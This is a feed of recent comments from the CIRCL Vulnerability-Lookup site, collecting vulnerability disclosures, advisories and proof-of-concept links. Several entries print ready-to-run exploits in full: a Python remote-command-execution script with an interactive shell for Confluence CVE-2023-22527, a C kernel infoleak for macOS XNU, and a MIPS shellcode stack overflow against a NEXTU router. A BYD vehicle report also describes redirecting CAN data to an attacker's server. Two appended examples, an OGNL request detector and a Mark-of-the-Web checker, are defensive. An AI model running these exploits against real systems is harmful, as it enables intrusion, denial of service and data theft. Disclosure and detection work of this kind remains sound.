# Vulnerability-Lookup: most recent comments

Feed: https://vulnerability.circl.lu/comments/feed
Description: Most recent comment. Contains only the 10 most recent comments.
Updated: 2025-02-09T21:14:28.619150+00:00
Generator: Vulnerability-Lookup (info@circl.lu), python-feedgen

## CVE-2023-4047 PoC By Wild Pointer

Comment: https://vulnerability.circl.lu/comment/714ff721-cfd1-4d52-8dd7-18df34e59ed5
Author: Alexandre Dulaunoy (http://vulnerability.circl.lu/user/adulau)
Updated: 2025-02-09T21:14:28.626944+00:00

- [https://github.com/wildptr-io/Winrar-CVE-2023-40477-POC](https://github.com/wildptr-io/Winrar-CVE-2023-40477-POC)

Published: 2025-01-17T21:26:39.418096+00:00

## POC for CVE-2023-22527 (Confluence SSTI) - Struts2

Comment: https://vulnerability.circl.lu/comment/a58dda1d-0763-4d89-ad38-22d86eb55d6a
Author: Alexandre Dulaunoy (http://vulnerability.circl.lu/user/adulau)
Updated: 2025-02-09T21:14:28.626857+00:00

~~~python
import requests
import argparse


class exploit:
    def __init__(self, url):
        self.url = url

    def rce(self, cmd='', header='Ret-rce'):
        # OGNL injection through the `label` parameter of the text-inline.vm Velocity
        # template; the command to run is passed in the `x` parameter and executed with
        # freemarker.template.utility.Execute, its output being written to the response.
        data = 'label=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d.internalGet(\\u0027ognl\\u0027).findValue(#parameters.x,{})%2b\\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter().write((new freemarker.template.utility.Execute()).exec({"' + cmd + '"}))\r\n'
        r = requests.post(
            f'{self.url}/template/aui/text-inline.vm',
            data=data,
            headers={
                'Connection': 'close',
                'Content-Type': 'application/x-www-form-urlencoded',
                'Content-Length': str(len(data))
            }
        )
        # The command output precedes the template's own HTML in the response body.
        return r.text.split('<!DOCTYPE html>')[0].strip()

    def get_env(self):
        return self.rce(cmd='env')

    def shell(self):
        print('[DEBUG] Spawning semi-interactive shell ..')
        while 1:
            cmd = input('$ ')
            result = self.rce(cmd)
            print(result)


def parse_args():
    parser = argparse.ArgumentParser(add_help=True, description='This is a POC for CVE-2023-22527 (Confluence SSTI)')
    parser.add_argument("-u", dest="url", type=str, required=True, help="Url")
    parser.add_argument("-c", dest="command", type=str, required=False, default=None, help="Command")
    parser.add_argument("-e", dest="env", action="store_true", required=False, default=False, help="Get environment vars")
    parser.add_argument("-i", dest="interactive", action="store_true", required=False, default=False, help="Interactive mode")
    return parser.parse_args()


def main(args):
    if args.command is None and not args.env and not args.interactive:
        print('[ERROR] Please provide a command using -c option')
        return
    exp = exploit(url=args.url)
    if args.env:
        res = exp.get_env()
        print(res)
    if args.command:
        res = exp.rce(args.command)
        print(res)
    if args.interactive:
        exp.shell()


if __name__ == '__main__':
    args = parse_args()
    main(args=args)
~~~

Published: 2025-01-17T21:29:08.826577+00:00

## PoC - Microsoft Configuration Manager (ConfigMgr / SCCM) 2403 Unauthenticated SQL injections (CVE-2024-43468) exploit

Comment: https://vulnerability.circl.lu/comment/aea0fc6c-fa3d-4e98-aef1-a25b364fb2fe
Author: Alexandre Dulaunoy (http://vulnerability.circl.lu/user/adulau)
Updated: 2025-02-09T21:14:28.626770+00:00

[Microsoft Configuration Manager (ConfigMgr / SCCM) 2403 Unauthenticated SQL injections (CVE-2024-43468) exploit](https://github.com/synacktiv/CVE-2024-43468)

Published: 2025-01-21T15:32:07.384792+00:00

## 7-Zip File Manager didn't propagate Zone.Identifier stream for extracted files from nested archives

Comment: https://vulnerability.circl.lu/comment/ffe0aeca-4687-4168-a295-b0334927e4c5
Author: Alexandre Dulaunoy (http://vulnerability.circl.lu/user/adulau)
Updated: 2025-02-09T21:14:28.626679+00:00

~~~
24.09          2024-11-29
-------------------------
- The default dictionary size values for LZMA/LZMA2 compression methods were increased:
         dictionary size   compression level
  v24.08  v24.09  v24.09
          32-bit  64-bit
    8 MB   16 MB   16 MB  -mx4
   16 MB   32 MB   32 MB  -mx5 : Normal
   32 MB   64 MB   64 MB  -mx6
   32 MB   64 MB  128 MB  -mx7 : Maximum
   64 MB   64 MB  256 MB  -mx8
   64 MB   64 MB  256 MB  -mx9 : Ultra
  The default dictionary size values for 32-bit versions of LZMA/LZMA2 don't exceed 64 MB.
- 7-Zip now can calculate the following hash checksums: SHA-512, SHA-384, SHA3-256 and MD5.
- APM and HFS support was improved.
- If an archive update operation uses a temporary archive folder and the archive is moved to the destination folder, 7-Zip shows the progress of moving the archive file, as this operation can take a long time if the archive is large.
- The bug was fixed: 7-Zip File Manager didn't propagate Zone.Identifier stream for extracted files from nested archives (if there is open archive inside another open archive).
- Some bugs were fixed.
~~~

[https://sourceforge.net/p/sevenzip/discussion/45797/thread/b95432c7ac/](https://sourceforge.net/p/sevenzip/discussion/45797/thread/b95432c7ac/)

Published: 2025-01-23T07:14:02.895881+00:00

## A particularly 'sus' sysctl in the XNU Kernel

Comment: https://vulnerability.circl.lu/comment/fa8ceb01-4bdc-4f10-8a64-5a1b671dc259
Author: Cédric Bonhomme (http://vulnerability.circl.lu/user/cedric)
Updated: 2025-02-09T21:14:28.626584+00:00

### Timeline

* September 16, 2024: macOS 15.0 Sequoia was released with xnu-11215.1.10, the first public kernel release with this bug.
* Fall 2024: I reported this bug to Apple.
* December 11, 2024: macOS 15.2 and iOS 18.2 were released, fixing this bug, and assigning CVE-2024-54507 to this issue.

Published: 2025-01-24T06:18:07.537395+00:00

## Proof Of Concept

Comment: https://vulnerability.circl.lu/comment/25c99b1c-5ba6-4c88-bac6-3ad6c5e525b4
Author: Cédric Bonhomme (http://vulnerability.circl.lu/user/cedric)
Updated: 2025-02-09T21:14:28.626489+00:00

```c
// ravi (@0xjprx)
// 2-byte kernel infoleak, introduced in xnu-11215.1.10.
// gcc SUSCTL.c -o susctl
// ./susctl
#include <stdint.h>
#include <stdio.h>
#include <sys/sysctl.h>

// Read the sysctl into a zeroed 8-byte buffer and print the two bytes
// (bits 16..31) that the kernel fills with data it never initialised.
void leak() {
    uint64_t val = 0;
    size_t len = sizeof(val);
    sysctlbyname("net.inet.udp.log.remote_port_excluded", &val, &len, NULL, 0);
    printf("leaked: 0x%llX 0x%llX\n", (val >> 16) & 0x0FF, (val >> 24) & 0x0FF);
}

int main() {
    leak();
    return 0;
}
```

from https://github.com/jprx/CVE-2024-54507

Published: 2025-01-24T06:32:36.489951+00:00

## Yealink informs that the SIP-T46S has been discontinued since 2022-03-31

Comment: https://vulnerability.circl.lu/comment/b66f6073-c25f-43da-a3ab-4d70b3c8933b
Author: Cédric Bonhomme (http://vulnerability.circl.lu/user/cedric)
Updated: 2025-02-09T21:14:28.626387+00:00

"""
Dear Customers,

Yealink hereby informs you that the SIP-T46S has been discontinued since 2022-03-31. After the date, new orders for the product would not be accepted.

After the End-of-Life date, Yealink will not pursue any new feature development on SIP-T46S, but we will follow the industry standard practices regarding software support of the discontinued (EOL) products. Consistent with such standards, Yealink will continue to offer support and after-sale service. The general policy guidelines are:

(1) For the first year from the End of Life date, Yealink will offer full support, including HW/SW Technical Support, Apply Existing SW Bug Fixes, New Non-Critical SW Bug Fixes, New Critical SW Bug Fixes and New Security Fixes.

(2) For the second year till, and including, the fifth year from the End of Life, Yealink will attempt to provide SW bug fixes. In the EOL support phase, a SW upgrade of the product to a newer existing release will also be seen as a fix to the SW bug. Providing a fix may not be possible in some cases due to the limitation of hardware or software architecture, and Yealink in its sole discretion will determine what fixes, if any, will be provided.

(3) Yealink will not offer any New Features/Enhancements support from the End of Life.
(4) Spares or replacement parts for hardware will be available depending on your local distributors. Please contact your local Yealink distributors for HW Technical Support and HW Repair and Return (subject to inventory availability). The local Yealink distributors will provide you the corresponding HW support in accordance with Yealink Return Materials Authorization (RMA) process.

(5) Since the sixth year from the End of Life, Yealink will not offer any Support.
"""

Published: 2025-01-24T10:18:50.387271+00:00

## A vulnerability report for BYD (Chinese car maker)

Comment: https://vulnerability.circl.lu/comment/21f63dda-f998-4c51-b7ce-6efc09015c56
Author: Cédric Bonhomme (http://vulnerability.circl.lu/user/cedric)
Updated: 2025-02-09T21:14:28.626257+00:00

# Vulnerability Report - BYD QIN PLUS DM-i - Dilink OS - Incorrect Access Control

**Product:** BYD QIN PLUS DM-i - Dilink OS

**Vendor:** https://www.byd.com/

**Version:** 3.0_13.1.7.2204050.1

**Vulnerability Type:** Incorrect Access Control

**Attack Vectors:** The user installs and runs an app on the IVI system that only requires normal permissions.

## Introduction

The BYD QIN PLUS DM-i with Dilink OS contains an Incorrect Access Control vulnerability. Attackers can bypass permission restrictions and obtain confidential vehicle data through **Attack Path 1**: **System Log Theft** and **Attack Path 2**: **CAN Traffic Hijacking**.

## Attack Path 1: System Log Theft

Incorrect access control in BYD QIN PLUS DM-i Dilink OS 3.0_13.1.7.2204050.1 allows unauthorized attackers to access system logcat logs.

### Description

The DiLink 3.0 system's /system/bin/app_process64 process logs system logcat data, storing it in zip files in the /sdcard/logs folder. These logs are accessible by regular apps, allowing them to bypass restrictions, escalate privileges, and potentially copy and upload sensitive vehicle data (e.g., location, fuel/energy consumption, VIN, mileage) to an attacker's server.
This poses a serious security risk, as the data is highly confidential for both users and manufacturers.

### Detailed Steps

1. Check the system-collected and stored system logs.

   ![log.png](https://s2.loli.net/2025/01/26/MRTCqKnv1aEIpQZ.png)

2. The malicious app copies system files to its own private directory. The main code is as follows:

   <img src="https://s2.loli.net/2025/01/26/EqxHDSX9O5Ibhr4.png" alt=".png" style="zoom: 50%;" />

3. The malicious app successfully steals system logs to its private directory.

   ![.png](https://s2.loli.net/2025/01/26/r7vsY93LgTb6coF.png)

4. Extract the file and search for sensitive confidential information in the system logs.

   (a) Fuel consumption, energy consumption, and seatbelt status.

   ![111.png](https://s2.loli.net/2025/01/26/6jkmACTRwxaX7sb.png)

   (b) ICCID, VIN (Vehicle Identification Number), and model code.

   ![vin.png](https://s2.loli.net/2025/01/26/nJWl3fq5QKVNuEx.png)

   (c) Diagnostic command format.

   ![.png](https://s2.loli.net/2025/01/26/jc3xCTkUd8a4ZF2.png)

   (d) Various detailed vehicle status information.

   ![.png](https://s2.loli.net/2025/01/26/lSTFK7thceQJ16b.png)

### **Ethical Considerations**

The vulnerability has been reported to the manufacturer and confirmed. It has been addressed and fixed in the latest versions, with the logs now encrypted.

### Additional Notes

Our vulnerability discovery was conducted on a standalone in-vehicle system, and due to the absence of a real vehicle, the logs collected by the system were quite limited. In a real vehicle, we expect to collect a much richer and larger volume of logs. Due to device limitations, we were unable to conduct further verification. Additionally, only one version of the in-vehicle system was tested, but other versions may also contain the same vulnerability, with the actual impact potentially being more severe.

### Disclaimer

This vulnerability report is intended solely for informational purposes and must not be used for malicious activities.
The author disclaims any responsibility for the misuse of the information provided.

## Attack Path 2: CAN Traffic Hijacking

The attacker can remotely intercept the vehicle's CAN traffic, which is supposed to be sent to the manufacturer's cloud server, and potentially use this data to infer the vehicle's status.

### Description

In the DiLink 3.0 system, the /system/priv-app/CanDataCollect folder is accessible to regular users, allowing them to extract CanDataCollect.apk and analyze its code. The "com.byd.data_collection_notify" broadcast, not protected by the system, lets apps set the CAN traffic upload URL. This enables attackers to:

1. Set the upload URL to null, preventing cloud data collection.
2. Set the upload URL to an attacker's domain for remote CAN traffic collection.

Additionally, the encoded upload files can be decrypted using reverse-engineered decoding functions, enabling attackers to remotely analyze CAN traffic and infer the vehicle's status.

### Detailed Steps

1. The vulnerable code for the broadcast handling in CanDataCollect.apk.

   <img src="https://s2.loli.net/2025/01/26/RanvVwJZYUuq9i8.png" alt=".png" style="zoom:50%;" />

2. The exploitation code for the malicious app vulnerability.

   <img src="https://s2.loli.net/2025/01/26/QBC8cxEkKtuY5XT.png" alt=".png" style="zoom:50%;" />

3. The malicious app successfully modifies the uploaded CAN traffic URL.

   ![.png](https://s2.loli.net/2025/01/26/sugvP14iSFrAhHW.png)

4. After the attack on the IVI system, the logcat logs route CAN traffic to the attacker's server.

   <img src="https://s2.loli.net/2025/01/26/2Cxtc3UvFe9X7pn.png" alt=".png" style="zoom: 50%;" />

5. The CAN traffic collected by the attacker and the decoded results.

   <img src="https://s2.loli.net/2025/01/27/YqinPrht6S8CFBW.png" alt=".png" style="zoom:50%;" />

### **Ethical Considerations**

The vulnerability has been reported to the manufacturer and confirmed. It has been addressed and fixed in the latest versions.
### Additional Notes

Our vulnerability discovery was conducted on a standalone in-vehicle system, and due to the absence of a real vehicle, the logs collected by the system were quite limited. In a real vehicle, we expect to collect a much richer and larger volume of logs. Due to device limitations, we were unable to conduct further verification. Additionally, only one version of the in-vehicle system was tested, but other versions may also contain the same vulnerability, with the actual impact potentially being more severe.

### Disclaimer

This vulnerability report is intended solely for informational purposes and must not be used for malicious activities. The author disclaims any responsibility for the misuse of the information provided.

Published: 2025-01-26T17:57:50.934368+00:00

## PoC - AMD EPYC 7B13 64-Core Processor (Milan) and AMD Ryzen 9 7940HS w/ Radeon 780M Graphics (Phoenix).

Comment: https://vulnerability.circl.lu/comment/4479dea7-72fb-4d91-90f4-95ffec3e0310
Author: Alexandre Dulaunoy (http://vulnerability.circl.lu/user/adulau)
Updated: 2025-02-09T21:14:28.624992+00:00

- [PoC Tested on AMD EPYC 7B13 64-Core Processor (Milan) and AMD Ryzen 9 7940HS w/ Radeon 780M Graphics (Phoenix).](https://github.com/google/security-research/tree/master/pocs/cpus/entrysign)

We've provided these PoCs to demonstrate that this vulnerability allows an adversary to produce arbitrary microcode patches. They cause the RDRAND instruction to always return the constant 4, but also set the carry flag (CF) to 0 to indicate that the returned value is invalid. Because correct use of the RDRAND instruction requires checking that CF is 1, this PoC can not be used to compromise correctly functioning confidential computing workloads. Additional tools and resources will be made public on March 5.
Published: 2025-02-05T07:31:30.100378+00:00

## NEXTU FLETA Wifi6 Router DOS, Potential RCE POC

Comment: https://vulnerability.circl.lu/comment/8b27e542-2740-435c-9317-55790ef4965b
Author: Cédric Bonhomme (http://vulnerability.circl.lu/user/cedric)
Updated: 2025-02-09T21:14:28.622922+00:00

```python
import socket
import ssl

from pwn import *
from hackebds import *


def shutdown_shell_code():
    # MIPS32 little-endian shellcode: execve("/bin/sh", ["autoreboot"], NULL), then exit()
    context.update(arch='mips', os='linux', bits=32, endian='little')
    cmd = "/bin/sh"
    args = ["autoreboot"]
    asmcode = shellcraft.mips.linux.execve(cmd, args, 0) + shellcraft.mips.linux.exit()
    shellcode = asm(asmcode)
    return shellcode


power_off_code = shutdown_shell_code()
# Padding up to the saved return address on the stack
gap_code = (b'A') * 0x138

# This is the area that overwrites the RET region. You can place the address to which you want to redirect the execution flow.
# For example I fixed address as 0x7f854710
RET_address = (b'\x10\x47\x85\x7f')
stack_gap = (b'C') * 0x40

print("power_off_code_length")
print(len(power_off_code))

final_code = power_off_code + gap_code + RET_address + stack_gap

# Server Address and Port
HOST = '192.168.1.254'
PORT = 443

# Create an SSL socket for HTTPS connection (the router's self-signed certificate is not verified)
ssl_context = ssl.create_default_context()
ssl_context.set_ciphers('HIGH:!DH:!aNULL')
ssl_context.check_hostname = False
ssl_context.verify_mode = ssl.CERT_NONE

with socket.create_connection((HOST, PORT)) as sock:
    with ssl_context.wrap_socket(sock, server_hostname=HOST) as ssock:
        # Prepare the shellcode as bytes (e.g., b'\x00\x01\x02'; replace with appropriate values for actual use)
        # parameter for evade verification; the overflowing value is the `entry_name` field
        send_byte = b"enabled=ON&automaticUplinkSpeed=ON&automaticDownlinkSpeed=ON&addressType=0&ipversion=0&protocol=0&ipStart=192.168.1.5&ipEnd=192.168.1.5&localPortStart=1234&localPortEnd=1234&rmt_ipStart=&rmt_ipEnd=&rmt_portStart=&rmt_portEnd=&l7_protocol=Disable&mode=1&bandwidth=200&bandwidth_downlink=200&remark_dscp=&save_apply=%EC%A0%80%EC%9E%A5+%ED%9B%84+%EC%A0%81%EC%9A%A9&addQosFlag=1&lan_mask=255.255.255.0&submit-url=%2Fip_qos.htm&entry_name=" + final_code

        # POST request headers
        headers = (b"POST /boafrm/formIpQoS HTTP/1.1\r\n"
                   b"Host: " + HOST.encode('utf-8') + b"\r\n"
                   b"Content-Type: application/octet-stream\r\n"
                   b"Content-Length: " + str(len(send_byte)).encode('utf-8') + b"\r\n"
                   b"Connection: close\r\n\r\n")

        # Send request (combine headers and body)
        ssock.sendall(headers + send_byte)

        # Receive response
        response = b""
        while True:
            data = ssock.recv(1024)
            if not data:
                break
            response += data

        # Print response (the body may contain raw binary, so undecodable bytes are replaced)
        print(response.decode('utf-8', errors='replace'))
```

Published: 2025-02-07T03:41:54.937264+00:00
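Added detection example, not part of the feed above and not the PoC author's code: a check over captured HTTP request records that flags attempts matching the CVE-2023-22527 PoC posted in the "POC for CVE-2023-22527 (Confluence SSTI) - Struts2" comment. The record format (dicts with `method`, `path` and `body`, as a reverse proxy or WAF might log them) and the sample records are constructed for this example; the template path `/template/aui/text-inline.vm` and the OGNL/FreeMarker fragments are taken from the PoC payload. Function names are this example's own.

```python
"""Flag HTTP requests that carry the OGNL injection used by the CVE-2023-22527 PoC."""
import re
from urllib.parse import unquote

# Request shape used by the PoC: a POST to a Velocity template under /template/.
TEMPLATE_PATH = re.compile(r"/template/[^?]*\.vm$")

# OGNL / FreeMarker fragments that never belong in a `label` value.
OGNL_MARKERS = (
    "KEY_velocity.struts2.context",
    ".internalGet(",
    ".findValue(",
    "@org.apache.struts2.ServletActionContext@",
    "freemarker.template.utility.Execute",
)

_UNICODE_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")


def normalise(body: str) -> str:
    """Undo the two encodings the PoC relies on: percent-encoding first, then \\uXXXX escapes."""
    body = unquote(body)
    return _UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), body)


def classify_request(method: str, path: str, body: str) -> list:
    """Return the exploit indicators found in one request; an empty list means nothing suspicious."""
    if method.upper() != "POST" or not TEMPLATE_PATH.search(path.split("?", 1)[0]):
        return []
    decoded = normalise(body)
    return [marker for marker in OGNL_MARKERS if marker in decoded]


def scan_records(records) -> list:
    """Return (index, path, indicators) for every record that looks like an exploitation attempt."""
    hits = []
    for i, rec in enumerate(records):
        found = classify_request(rec["method"], rec["path"], rec["body"])
        if found:
            hits.append((i, rec["path"], found))
    return hits


# Constructed sample records: the PoC payload running `id`, a benign POST to the same
# template, OGNL text sent to an unrelated endpoint, and a GET to the template.
SAMPLE_RECORDS = [
    {"method": "POST", "path": "/template/aui/text-inline.vm",
     "body": 'label=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d'
             '.internalGet(\\u0027ognl\\u0027).findValue(#parameters.x,{})%2b\\u0027'
             '&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter().write('
             '(new freemarker.template.utility.Execute()).exec({"id"}))'},
    {"method": "POST", "path": "/template/aui/text-inline.vm", "body": "label=Summary&x=1"},
    {"method": "POST", "path": "/rest/api/content", "body": "findValue(#parameters.x)"},
    {"method": "GET", "path": "/template/aui/text-inline.vm?label=x", "body": ""},
]

if __name__ == "__main__":
    for index, path, indicators in scan_records(SAMPLE_RECORDS):
        print(f"record {index}: {path} -> {', '.join(indicators)}")
```

Decoding before matching matters: the PoC hides the quotes and brackets behind `\u0027`/`\u005b` escapes and `%2b`, so a rule that only looks at the raw body for `'+#request[` never fires. The path restriction keeps the rule cheap, but if an environment serves Confluence under a context path the match still works because the pattern is anchored on `/template/` rather than on the start of the path.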
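Added example, not from 7-Zip and not the commenter's code: a post-extraction check for the Mark of the Web that the 7-Zip 24.09 changelog quoted above says was not propagated to files extracted from nested archives. The `Zone.Identifier` stream is read through the NTFS `path:Zone.Identifier` syntax, so the file check only finds streams on Windows/NTFS (elsewhere every file is reported as unmarked); the stream parser itself is portable. The sample stream content is constructed, and the function names are this example's own.

```python
"""Report extracted files that lack a Zone.Identifier (Mark of the Web) stream."""
import os
from typing import Optional

ZONE_STREAM = ":Zone.Identifier"
# URLMON zone ids: 0 local machine, 1 intranet, 2 trusted, 3 Internet, 4 restricted.
UNTRUSTED_ZONES = {3, 4}


def parse_zone_identifier(text: str) -> dict:
    """Parse the INI-style stream content; only the [ZoneTransfer] section is kept.

    ZoneId is converted to an int so callers can compare it against zone numbers.
    """
    values = {}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section != "ZoneTransfer" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        values[key.strip()] = value.strip()
    if "ZoneId" in values:
        try:
            values["ZoneId"] = int(values["ZoneId"])
        except ValueError:
            pass
    return values


def read_zone_id(path: str) -> Optional[int]:
    """Return the ZoneId recorded for `path`, or None when the stream is absent.

    Alternate data streams only exist on NTFS; on other platforms the open() fails
    and the file is reported as unmarked, which is the conservative answer.
    """
    try:
        with open(path + ZONE_STREAM, "r", encoding="utf-8", errors="replace") as fh:
            return parse_zone_identifier(fh.read()).get("ZoneId")
    except OSError:
        return None


def is_from_untrusted_zone(zone_id: Optional[int]) -> bool:
    """True when the stream says the file came from the Internet or Restricted zone."""
    return zone_id in UNTRUSTED_ZONES


def unmarked_files(root: str) -> list:
    """Walk an extraction directory and list files that carry no Zone.Identifier stream."""
    missing = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if read_zone_id(full) is None:
                missing.append(full)
    return sorted(missing)


# Constructed sample stream, shaped like what Windows writes for an Internet download.
SAMPLE_STREAM = (
    "[ZoneTransfer]\r\n"
    "ZoneId=3\r\n"
    "ReferrerUrl=https://example.invalid/\r\n"
    "HostUrl=https://example.invalid/nested.7z\r\n"
)

if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path in unmarked_files(root):
        print(f"no Mark of the Web: {path}")
```

Run it against the folder you just extracted an archive into (`python motw_check.py C:\extracted`): with the pre-24.09 behaviour described in the changelog, files that came out of an archive nested inside another archive show up in the list even though the outer archive was downloaded from the Internet, and SmartScreen and the Office Protected View decisions that key off ZoneId=3 are skipped for them.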